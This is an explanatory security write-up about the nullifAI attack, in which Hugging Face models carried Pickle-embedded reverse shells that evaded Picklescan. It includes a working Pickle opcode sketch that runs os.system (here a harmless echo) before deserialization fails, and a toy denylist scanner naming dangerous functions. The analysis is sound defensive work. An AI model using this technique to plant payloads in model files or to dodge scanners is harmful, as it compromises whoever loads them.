The nullifAI attack exploits Pickle file serialization, an insecure method for storing ML models, to distribute malware-laced PyTorch models on Hugging Face. Instead of using PyTorch’s default ZIP archive format, the attackers compressed the models with 7z, preventing them from loading via a plain torch.load() call and evading Picklescan detection. The malicious payload, a reverse shell, was embedded at the beginning of the Pickle stream, ensuring it executed before the deserialization process encountered an error. Once triggered, the payload established a remote connection to a hardcoded IP address, giving the attackers unauthorized access to the compromised system.
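To illustrate the mechanism (not the attackers’ actual payload), here is a minimal, harmless sketch in Python: hand-written Pickle opcodes invoke os.system, with a benign echo command standing in for the reverse shell, and the stream is deliberately left malformed so that deserialization fails only after the call has already run.

```python
import pickle

# Hand-assembled protocol-0 Pickle opcodes. A harmless `echo` stands in
# for the attackers' reverse-shell command.
payload = (
    b"cos\nsystem\n"           # GLOBAL: push os.system onto the stack
    b"(S'echo payload ran'\n"  # MARK + STRING: push the command argument
    b"tR"                      # TUPLE + REDUCE: call os.system('echo payload ran')
    b"\x00"                    # junk byte, no STOP opcode: the stream is "broken"
)

try:
    pickle.loads(payload)
except pickle.UnpicklingError as exc:
    # By the time unpickling fails on the junk byte, os.system has
    # already executed -- exactly the ordering the attack relies on.
    print(f"deserialization failed: {exc!r}")
```

Running this prints "payload ran" first and the UnpicklingError second: Pickle is an opcode stream executed sequentially, so everything before the malformed tail runs regardless of how the load ends.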
The security flaw in Picklescan lies in its blacklist-based detection, which can be bypassed by invoking dangerous functions that the blacklist does not cover. Furthermore, Picklescan fails to properly scan broken Pickle files, so a malicious payload can execute at load time without the file ever being flagged. After responsible disclosure, Hugging Face removed the malicious models within 24 hours and improved Picklescan’s detection capabilities to address these gaps.
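The broken-file gap can be sketched the same way. The toy denylist scanner below is an illustration, not Picklescan’s actual code: the DENYLIST contents and the scan() helper are hypothetical. It walks the opcode stream with pickletools.genops and reports only after a complete pass, so on the malformed payload from the sketch above the walk raises before any verdict is produced, even though pickle.loads on the same bytes would already have run the command.

```python
import pickletools

# Hypothetical denylist in the spirit of blacklist-based scanners;
# the entries here are illustrative, not Picklescan's actual list.
DENYLIST = {("os", "system"), ("posix", "system"), ("builtins", "eval")}

def scan(data: bytes) -> list[str]:
    """Collect dangerous GLOBAL imports, reporting only after a full walk."""
    findings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL" and arg:
            module, _, name = arg.rpartition(" ")
            if (module, name) in DENYLIST:
                findings.append(f"{module}.{name}")
    return findings

try:
    print("findings:", scan(payload))  # `payload` from the sketch above
except ValueError as exc:
    # genops chokes on the junk byte, so the os.system import seen
    # earlier is never reported -- the broken file sails through.
    print(f"scan aborted, file not flagged: {exc!r}")
```

A scanner that requires a well-formed stream before rendering a verdict gives broken-but-still-dangerous files a pass, which is precisely the asymmetry the nullifAI models exploited.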